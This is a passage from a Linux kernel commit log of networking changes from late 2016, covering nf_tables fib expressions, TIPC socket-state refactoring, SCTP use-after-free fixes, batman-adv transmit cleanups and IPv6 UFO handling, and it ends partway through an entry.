f6d0cbcf09 netfilter: nf_tables: add fib expression
Add FIB expression, supported for ipv4, ipv6 and inet family (the latter
just dispatches to ipv4 or ipv6 one based on nfproto).

Currently supports fetching output interface index/name and the
rtm_type associated with an address.

This can be used for adding path filtering. rtm_type is useful
to e.g. enforce a strong-end host model where packets
are only accepted if daddr is configured on the interface the
packet arrived on.

The fib expression is a native nftables alternative to the
xtables addrtype and rp_filter matches.

FIB result order for oif/oifname retrieval is as follows:
 - if packet is local (skb has rtable, RTF_LOCAL set, this
   will also catch looped-back multicast packets), set oif to
   the loopback interface.
 - if fib lookup returns an error, or result points to local,
   store zero result.  This means '--local' option of -m rpfilter
   is not supported. It is possible to use 'fib type local' or add
   explicit saddr/daddr matching rules to create exceptions if this
   is really needed.
 - store result in the destination register.
   In case of multiple routes, search set for desired oif in case
   strict matching is requested.

ipv4 and ipv6 behave fib expressions are supposed to behave the same.

[ I have collapsed Arnd Bergmann's ("netfilter: nf_tables: fib warnings")

	http://patchwork.ozlabs.org/patch/688615/

  to address fallout from this patch after rebasing nf-next, that was
  posted to address compilation warnings. --pablo ]

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-01 20:50:14 +01:00
J. Bruce Fields
56094edd17 sunrpc: GFP_KERNEL should be GFP_NOFS in crypto code
Writes may depend on the auth_gss crypto code, so we shouldn't be
allocating with GFP_KERNEL there.

This still leaves some crypto_alloc_* calls which end up doing
GFP_KERNEL allocations in the crypto code.  Those could probably done at
crypto import time.

Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-11-01 15:47:52 -04:00
Chuck Lever
8d42629be0 svcrdma: backchannel cannot share a page for send and rcv buffers
The underlying transport releases the page pointed to by rq_buffer
during xprt_rdma_bc_send_request. When the backchannel reply arrives,
rq_rbuffer then points to freed memory.

Fixes: 68778945e4 ('SUNRPC: Separate buffer pointers for RPC ...')
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Cc: Jeff Layton <jlayton@redhat.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-11-01 15:23:58 -04:00
Isaac Boukris
e7947ea770 unix: escape all null bytes in abstract unix domain socket
Abstract unix domain socket may embed null characters,
these should be translated to '@' when printed out to
proc the same way the null prefix is currently being
translated.

This helps for tools such as netstat, lsof and the proc
based implementation in ss to show all the significant
bytes of the name (instead of getting cut at the first
null occurrence).

Signed-off-by: Isaac Boukris <iboukris@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 12:15:13 -04:00
Wei Yongjun
22ca904ad7 genetlink: fix error return code in genl_register_family()
Fix to return a negative error code from the idr_alloc() error handling
case instead of 0, as done elsewhere in this function.

Also fix the return value check of idr_alloc() since idr_alloc return
negative errors on failure, not zero.

Fixes: 2ae0f17df1 ("genetlink: use idr to track families")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 12:13:13 -04:00
David Ahern
e58e415968 net: Enable support for VRF with ipv4 multicast
Enable support for IPv4 multicast:
- similar to unicast the flow struct is updated to L3 master device
  if relevant prior to calling fib_rules_lookup. The table id is saved
  to the lookup arg so the rule action for ipmr can return the table
  associated with the device.

- ip_mr_forward needs to check for master device mismatch as well
  since the skb->dev is set to it

- allow multicast address on VRF device for Rx by checking for the
  daddr in the VRF device as well as the original ingress device

- on Tx need to drop to __mkroute_output when FIB lookup fails for
  multicast destination address.

- if CONFIG_IP_MROUTE_MULTIPLE_TABLES is enabled VRF driver creates
  IPMR FIB rules on first device create similar to FIB rules. In
  addition the VRF driver does not divert IPv4 multicast packets:
  it breaks on Tx since the fib lookup fails on the mcast address.

With this patch, ipmr forwarding and local rx/tx work.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:54:26 -04:00
Parthasarathy Bhuvaragan
f40acbaf42 tipc: remove SS_CONNECTED sock state
In this commit, we replace references to sock->state SS_CONNECTE
with sk_state TIPC_ESTABLISHED.

Finally, the sock->state is no longer explicitly used by tipc.
The FSM below is for various types of connection oriented sockets.

Stream Server Listening Socket:
+-----------+       +-------------+
| TIPC_OPEN |------>| TIPC_LISTEN |
+-----------+       +-------------+

Stream Server Data Socket:
+-----------+       +------------------+
| TIPC_OPEN |------>| TIPC_ESTABLISHED |
+-----------+       +------------------+
                          ^   |
                          |   |
                          |   v
                    +--------------------+
                    | TIPC_DISCONNECTING |
                    +--------------------+

Stream Socket Client:
+-----------+       +-----------------+
| TIPC_OPEN |------>| TIPC_CONNECTING |------+
+-----------+       +-----------------+      |
                            |                |
                            |                |
                            v                |
                    +------------------+     |
                    | TIPC_ESTABLISHED |     |
                    +------------------+     |
                          ^   |              |
                          |   |              |
                          |   v              |
                    +--------------------+   |
                    | TIPC_DISCONNECTING |<--+
                    +--------------------+

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:26 -04:00
Parthasarathy Bhuvaragan
99a2088981 tipc: create TIPC_CONNECTING as a new sk_state
In this commit, we create a new tipc socket state TIPC_CONNECTING
by primarily replacing the SS_CONNECTING with TIPC_CONNECTING.

There is no functional change in this commit.

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:26 -04:00
Parthasarathy Bhuvaragan
6f00089c73 tipc: remove SS_DISCONNECTING state
In this commit, we replace the references to SS_DISCONNECTING with
the combination of sk_state TIPC_DISCONNECTING and flags set in
sk_shutdown.
We introduce a new function _tipc_shutdown(), which provides
the common code required by tipc_release() and tipc_shutdown().

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:25 -04:00
Parthasarathy Bhuvaragan
9fd4b070f6 tipc: create TIPC_DISCONNECTING as a new sk_state
In this commit, we create a new tipc socket state TIPC_DISCONNECTING in
sk_state. TIPC_DISCONNECTING is replacing the socket connection status
update using SS_DISCONNECTING.
TIPC_DISCONNECTING is set for connection oriented sockets at:
- tipc_shutdown()
- connection probe timeout
- when we receive an error message on the connection.

There is no functional change in this commit.

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:25 -04:00
Parthasarathy Bhuvaragan
438adcaf0d tipc: create TIPC_OPEN as a new sk_state
In this commit, we create a new tipc socket state TIPC_OPEN in
sk_state. We primarily replace the SS_UNCONNECTED sock->state with
TIPC_OPEN.

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:25 -04:00
Parthasarathy Bhuvaragan
8ea642ee9a tipc: create TIPC_ESTABLISHED as a new sk_state
Until now, tipc maintains probing state for connected sockets in
tsk->probing_state variable.

In this commit, we express this information as socket states and
this remove the variable. We set probe_unacked flag when a probe
is sent out and reset it if we receive a reply. Instead of the
probing state TIPC_CONN_OK, we create a new state TIPC_ESTABLISHED.

There is no functional change in this commit.

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:25 -04:00
Parthasarathy Bhuvaragan
0c288c8692 tipc: create TIPC_LISTEN as a new sk_state
Until now, tipc maintains the socket state in sock->state variable.
This is used to maintain generic socket states, but in tipc
we overload it and save tipc socket states like TIPC_LISTEN.
Other protocols like TCP, UDP store protocol specific states
in sk->sk_state instead.

In this commit, we :
- declare a new tipc state TIPC_LISTEN, that replaces SS_LISTEN
- Create a new function tipc_set_state(), to update sk->sk_state.
- TIPC_LISTEN state is maintained in sk->sk_state.
- replace references to SS_LISTEN with TIPC_LISTEN.

There is no functional change in this commit.

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:25 -04:00
Parthasarathy Bhuvaragan
c752023aab tipc: remove socket state SS_READY
Until now, tipc socket state SS_READY declares that the socket is a
connectionless socket.

In this commit, we remove the state SS_READY and replace it with a
condition which returns true for datagram / connectionless sockets.

Acked-by: Ying Xue <ying.xue@windriver.com>
Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:24 -04:00
Parthasarathy Bhuvaragan
360aab6b49 tipc: remove probing_intv from tipc_sock
Until now, probing_intv is a variable in struct tipc_sock but is
always set to a constant CONN_PROBING_INTERVAL. The socket
connection is probed based on this value.

In this commit, we remove this variable and setup the socket
timer based on the constant CONN_PROBING_INTERVAL.

There is no functional change in this commit.

Acked-by: Ying Xue <ying.xue@windriver.com>
Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:24 -04:00
Parthasarathy Bhuvaragan
d6fb7e9c99 tipc: remove tsk->connected from tipc_sock
Until now, we determine if a socket is connected or not based on
tsk->connected, which is set once when the probing state is set
to TIPC_CONN_OK. It is unset when the sock->state is updated from
SS_CONNECTED to any other state.

In this commit, we remove connected variable from tipc_sock and
derive socket connection status from the following condition:
sock->state == SS_CONNECTED => tsk->connected

There is no functional change in this commit.

Acked-by: Ying Xue <ying.xue@windriver.com>
Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:24 -04:00
Parthasarathy Bhuvaragan
87227fe7e4 tipc: remove tsk->connected for connectionless sockets
Until now, for connectionless sockets the peer information during
connect is stored in tsk->peer and a connection state is set in
tsk->connected. This is redundant.

In this commit, for connectionless sockets we update:
- __tipc_sendmsg(), when the destination is NULL the peer existence
  is determined by tsk->peer.family, instead of tsk->connected.
- tipc_connect(), remove set/unset of tsk->connected.
Hence tsk->connected is no longer used for connectionless sockets.

There is no functional change in this commit.

Acked-by: Ying Xue <ying.xue@windriver.com>
Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:24 -04:00
Parthasarathy Bhuvaragan
aeda16b6ae tipc: rename tsk->remote to tsk->peer for consistent naming
Until now, the peer information for connect is stored in tsk->remote
but the rest of code uses the name peer for peer/remote.

In this commit, we rename tsk->remote to tsk->peer to align with
naming convention followed in the rest of the code.

There is no functional change in this commit.

Acked-by: Ying Xue <ying.xue@windriver.com>
Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:24 -04:00
Parthasarathy Bhuvaragan
ba8aebe943 tipc: rename struct tipc_skb_cb member handle to bytes_read
In this commit, we rename handle to bytes_read indicating the
purpose of the member.

Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:23 -04:00
Parthasarathy Bhuvaragan
cb5da847af tipc: set kern=0 in sk_alloc() during tipc_accept()
Until now, tipc_accept() calls sk_alloc() with kern=1. This is
incorrect as the data socket's owner is the user application.
Thus for these accepted data sockets the network namespace
refcount is skipped.

In this commit, we fix this by setting kern=0.

Acked-by: Ying Xue <ying.xue@windriver.com>
Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:23 -04:00
Parthasarathy Bhuvaragan
4891d8fe16 tipc: wakeup sleeping users at disconnect
Until now, in filter_connect() when we terminate a connection due to
an error message from peer, we set the socket state to DISCONNECTING.

The socket is notified about this broken connection using EPIPE when
a user tries to send a message. However if a socket was waiting on a
poll() while the connection is being terminated, we fail to wakeup
that socket.

In this commit, we wakeup sleeping sockets at connection termination.

Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:23 -04:00
Parthasarathy Bhuvaragan
7cf87fa278 tipc: return early for non-blocking sockets at link congestion
Until now, in stream/mcast send() we pass the message to the link
layer even when the link is congested and add the socket to the
link's wakeup queue. This is unnecessary for non-blocking sockets.
If a socket is set to non-blocking and sends multicast with zero
back off time while receiving EAGAIN, we exhaust the memory.

In this commit, we return immediately at stream/mcast send() for
non-blocking sockets.

Acked-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: Parthasarathy Bhuvaragan <parthasarathy.bhuvaragan@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-01 11:53:23 -04:00
David S. Miller
2c8657d226 linux-can-fixes-for-4.9-20161031
-----BEGIN PGP SIGNATURE-----
 
 iQEwBAABCgAaBQJYF6ANExxta2xAcGVuZ3V0cm9uaXguZGUACgkQPTuqJaypJWqQ
 DAf+JRm7uhjaXEgITIhgiGIZBmCce7ONSBmBRr6cKcQyzMPaAHjfEZMcR5pltvH1
 z03bspu5oug3bfSxk4iYK9hNxxAV+URxFxBDbOMdnolAsl6ZBcpOkx2jj/JFByZ5
 fmOk8ChQr28qteEMLcTlm6O188eq2fZ+GUVZOh9iRslSVVcvGrM90NQoPFMUfP7G
 On9+rZzSZlyNvdCSdFwrjUDzMVEW77P1Hv3gG10koefgIZKLelmMOIwDg7EvGTon
 7HjqdZs6MFoSFAcbzJHB9lN0pAtK8nxWd3SPhdQof3kca8Dff/si4r5ZB2gAdSBq
 w17LfdWoVE4p5/XvSyM4SM/X9A==
 =Per+
 -----END PGP SIGNATURE-----

Merge tag 'linux-can-fixes-for-4.9-20161031' of git://git.kernel.org/pub/scm/linux/kernel/git/mkl/linux-can

Marc Kleine-Budde says:

====================
pull-request: can 2016-10-31

this is a pull request of two patches for the upcoming v4.9 release.

The first patch is by Lukas Resch for the sja1000 plx_pci driver that adds
support for Moxa CAN devices. The second patch is by Oliver Hartkopp and fixes
a potential kernel panic in the CAN broadcast manager.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 21:01:03 -04:00
Xin Long
dae399d7fd sctp: hold transport instead of assoc when lookup assoc in rx path
Prior to this patch, in rx path, before calling lock_sock, it needed to
hold assoc when got it by __sctp_lookup_association, in case other place
would free/put assoc.

But in __sctp_lookup_association, it lookup and hold transport, then got
assoc by transport->assoc, then hold assoc and put transport. It means
it didn't hold transport, yet it was returned and later on directly
assigned to chunk->transport.

Without the protection of sock lock, the transport may be freed/put by
other places, which would cause a use-after-free issue.

This patch is to fix this issue by holding transport instead of assoc.
As holding transport can make sure to access assoc is also safe, and
actually it looks up assoc by searching transport rhashtable, to hold
transport here makes more sense.

Note that the function will be renamed later on on another patch.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 16:20:33 -04:00
Xin Long
7c17fcc726 sctp: return back transport in __sctp_rcv_init_lookup
Prior to this patch, it used a local variable to save the transport that is
looked up by __sctp_lookup_association(), and didn't return it back. But in
sctp_rcv, it is used to initialize chunk->transport. So when hitting this,
even if it found the transport, it was still initializing chunk->transport
with null instead.

This patch is to return the transport back through transport pointer
that is from __sctp_rcv_lookup_harder().

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 16:20:32 -04:00
Xin Long
cd26da4ff4 sctp: hold transport instead of assoc in sctp_diag
In sctp_transport_lookup_process(), Commit 1cceda7849 ("sctp: fix
the issue sctp_diag uses lock_sock in rcu_read_lock") moved cb() out
of rcu lock, but it put transport and hold assoc instead, and ignore
that cb() still uses transport. It may cause a use-after-free issue.

This patch is to hold transport instead of assoc there.

Fixes: 1cceda7849 ("sctp: fix the issue sctp_diag uses lock_sock in rcu_read_lock")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 16:20:32 -04:00
Nikolay Aleksandrov
91b02d3d13 bridge: mcast: add router port on PIM hello message
When we receive a PIM Hello message on a port we can consider that it
has a multicast router attached, thus it is correct to add it to the
router list. The only catch is it shouldn't be considered for a querier.

Using Daniel's description:
leaf-11  leaf-12  leaf-13
       \   |    /
        bridge-1
         /    \
    host-11  host-12

 - all ports in bridge-1 are in a single vlan aware bridge
 - leaf-11 is the IGMP querier
 - leaf-13 is the PIM DR
 - host-11 TXes packets to 226.10.10.10
 - bridge-1 only forwards the 226.10.10.10 traffic out the port to
   leaf-11, it should also forward this traffic out the port to leaf-13

Suggested-by: Daniel Walton <dwalton@cumulusnetworks.com>
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 16:18:30 -04:00
Nikolay Aleksandrov
56245cae19 net: pim: add all RFC7761 message types
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 16:18:30 -04:00
Oliver Hartkopp
deb507f91f can: bcm: fix warning in bcm_connect/proc_register
Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang this patch adds a lock_sock() protection and
a check for unsuccessful proc_create_data() in bcm_connect().

Reference: http://marc.info/?l=linux-netdev&m=147732648731237

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Suggested-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: linux-stable <stable@vger.kernel.org>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
2016-10-31 20:48:19 +01:00
Eric Dumazet
4f2e4ad56a net: mangle zero checksum in skb_checksum_help()
Sending zero checksum is ok for TCP, but not for UDP.

UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.

Simply replace such checksum by 0xffff, regardless of transport.

This error was caught on SIT tunnels, but seems generic.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 15:29:11 -04:00
Eric Dumazet
e551c32d57 net: clear sk_err_soft in sk_clone_lock()
At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.

Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 15:25:55 -04:00
Florian Westphal
ce6dd23329 dctcp: avoid bogus doubling of cwnd after loss
If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to

   tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);

... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.

This can cause severe growth of cwnd (eventually overflowing u32).

Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.

Fixes: e3118e8359 ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 15:16:28 -04:00
Alexander Duyck
184c449f91 net: Add support for XPS with QoS via traffic classes
This patch adds support for setting and using XPS when QoS via traffic
classes is enabled.  With this change we will factor in the priority and
traffic class mapping of the packet and use that information to correctly
select the queue.

This allows us to define a set of queues for a given traffic class via
mqprio and then configure the XPS mapping for those queues so that the
traffic flows can avoid head-of-line blocking between the individual CPUs
if so desired.

Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 15:00:48 -04:00
Alexander Duyck
6234f87407 net: Refactor removal of queues from XPS map and apply on num_tc changes
This patch updates the code for removing queues from the XPS map and makes
it so that we can apply the code any time we change either the number of
traffic classes or the mapping of a given block of queues.  This way we
avoid having queues pulling traffic from a foreign traffic class.

Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 15:00:48 -04:00
Alexander Duyck
8d059b0f6f net: Add sysfs value to determine queue traffic class
Add a sysfs attribute for a Tx queue that allows us to determine the
traffic class for a given queue.  This will allow us to more easily
determine this in the future.  It is needed as XPS will take the traffic
class for a group of queues into account in order to avoid pulling traffic
from one traffic class into another.

Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 15:00:47 -04:00
Alexander Duyck
9cf1f6a8c4 net: Move functions for configuring traffic classes out of inline headers
The functions for configuring the traffic class to queue mappings have
other effects that need to be addressed.  Instead of trying to export a
bunch of new functions just relocate the functions so that we can
instrument them directly with the functionality they will need.

Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 15:00:47 -04:00
Xin Long
19bda36c42 ipv6: add mtu lock check in __ip6_rt_update_pmtu
Prior to this patch, ipv6 didn't do mtu lock check in ip6_update_pmtu.
It leaded to that mtu lock doesn't really work when receiving the pkt
of ICMPV6_PKT_TOOBIG.

This patch is to add mtu lock check in __ip6_rt_update_pmtu just as ipv4
did in __ip_rt_update_pmtu.

Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 14:24:24 -04:00
Jakub Sitnicki
f89c56ce71 ipv6: Don't use ufo handling on later transformed packets
Similar to commit c146066ab8 ("ipv4: Don't use ufo handling on later
transformed packets"), don't perform UFO on packets that will be IPsec
transformed. To detect it we rely on the fact that headerlen in
dst_entry is non-zero only for transformation bundles (xfrm_dst
objects).

Unwanted segmentation can be observed with a NETIF_F_UFO capable device,
such as a dummy device:

  DEV=dum0 LEN=1493

  ip li add $DEV type dummy
  ip addr add fc00::1/64 dev $DEV nodad
  ip link set $DEV up
  ip xfrm policy add dir out src fc00::1 dst fc00::2 \
     tmpl src fc00::1 dst fc00::2 proto esp spi 1
  ip xfrm state add src fc00::1 dst fc00::2 \
     proto esp spi 1 enc 'aes' 0x0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b

  tcpdump -n -nn -i $DEV -t &
  socat /dev/zero,readbytes=$LEN udp6:[fc00::2]:$LEN

tcpdump output before:

  IP6 fc00::1 > fc00::2: frag (0|1448) ESP(spi=0x00000001,seq=0x1), length 1448
  IP6 fc00::1 > fc00::2: frag (1448|48)
  IP6 fc00::1 > fc00::2: ESP(spi=0x00000001,seq=0x2), length 88

... and after:

  IP6 fc00::1 > fc00::2: frag (0|1448) ESP(spi=0x00000001,seq=0x1), length 1448
  IP6 fc00::1 > fc00::2: frag (1448|80)

Fixes: e89e9cf539 ("[IPv4/IPv6]: UFO Scatter-gather approach")

Signed-off-by: Jakub Sitnicki <jkbs@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 13:10:41 -04:00
Andrey Vagin
c62cce2cae net: add an ioctl to get a socket network namespace
Each socket operates in a network namespace where it has been created,
so if we want to dump and restore a socket, we have to know its network
namespace.

We have a socket_diag to get information about sockets, it doesn't
report sockets which are not bound or connected.

This patch introduces a new socket ioctl, which is called SIOCGSKNS
and used to get a file descriptor for a socket network namespace.

A task must have CAP_NET_ADMIN in a target network namespace to
use this ioctl.

Cc: "David S. Miller" <davem@davemloft.net>
Cc: Eric W. Biederman <ebiederm@xmission.com>
Signed-off-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-31 10:56:36 -04:00
Liping Zhang
b73b8a1ba5 netfilter: nft_dup: do not use sreg_dev if the user doesn't specify it
The NFTA_DUP_SREG_DEV attribute is not a must option, so we should use it
in routing lookup only when the user specify it.

Fixes: d877f07112 ("netfilter: nf_tables: add nft_dup expression")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-31 13:17:38 +01:00
Liping Zhang
c17c3cdff1 netfilter: nf_tables: destroy the set if fail to add transaction
When the memory is exhausted, then we will fail to add the NFT_MSG_NEWSET
transaction. In such case, we should destroy the set before we free it.

Fixes: 958bee14d0 ("netfilter: nf_tables: use new transaction infrastructure to handle sets")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-31 13:17:29 +01:00
David S. Miller
27058af401 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Mostly simple overlapping changes.

For example, David Ahern's adjacency list revamp in 'net-next'
conflicted with an adjacency list traversal bug fix in 'net'.

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-30 12:42:58 -04:00
Sven Eckelmann
1ad5bcb2a0 batman-adv: Consume skb in batadv_send_skb_to_orig
Sending functions in Linux consume the supplied skbuff. Doing the same in
batadv_send_skb_to_orig avoids the hack of returning -1 (-EPERM) to signal
the caller that he is responsible for cleaning up the skb.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:37 +01:00
Sven Eckelmann
8def0be82d batman-adv: Consume skb in batadv_frag_send_packet
Sending functions in Linux consume the supplied skbuff. Doing the same in
batadv_frag_send_packet avoids the hack of returning -1 (-EPERM) to signal
the caller that he is responsible for cleaning up the skb.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:37 +01:00
Sven Eckelmann
eaac2c876e batman-adv: Count all non-success TX packets as dropped
A failure during the submission also causes dropped packets.
batadv_interface_tx should therefore also increase the DROPPED counter for
these returns.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:36 +01:00
Sven Eckelmann
bd687fe419 batman-adv: use consume_skb for non-dropped packets
kfree_skb assumes that an skb is dropped after an failure and notes that.
consume_skb should be used in non-failure situations. Such information is
important for dropmonitor netlink which tells how many packets were dropped
and where this drop happened.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:36 +01:00
Linus Lüssing
3111beed0d batman-adv: Simple (re)broadcast avoidance
With this patch, (re)broadcasting on a specific interfaces is avoided:

* No neighbor: There is no need to broadcast on an interface if there
  is no node behind it.

* Single neighbor is source: If there is just one neighbor on an
  interface and if this neighbor is the one we actually got this
  broadcast packet from, then we do not need to echo it back.

* Single neighbor is originator: If there is just one neighbor on
  an interface and if this neighbor is the originator of this
  broadcast packet, then we do not need to echo it back.

Goodies for BATMAN V:

("Upgrade your BATMAN IV network to V now to get these for free!")

Thanks to the split of OGMv1 into two packet types, OGMv2 and ELP
that is, we can now apply the same optimizations stated above to OGMv2
packets, too.

Furthermore, with BATMAN V, rebroadcasts can be reduced in certain
multi interface cases, too, where BATMAN IV cannot. This is thanks to
the removal of the "secondary interface originator" concept in BATMAN V.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:35 +01:00
Linus Lüssing
cbebd363b2 batman-adv: Use own timer for multicast TT and TVLV updates
Instead of latching onto the OGM period, this patch introduces a worker
dedicated to multicast TT and TVLV updates.

The reasoning is, that upon roaming especially the translation table
should be updated timely to minimize connectivity issues.

With BATMAN V, the idea is to greatly increase the OGM interval to
reduce overhead. Unfortunately, right now this could lead to
a bad user experience if multicast traffic is involved.

Therefore this patch introduces a fixed 500ms update interval for
multicast TT entries and the multicast TVLV.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:35 +01:00
Linus Lüssing
eb6915e2eb batman-adv: Remove unused skb_reset_mac_header()
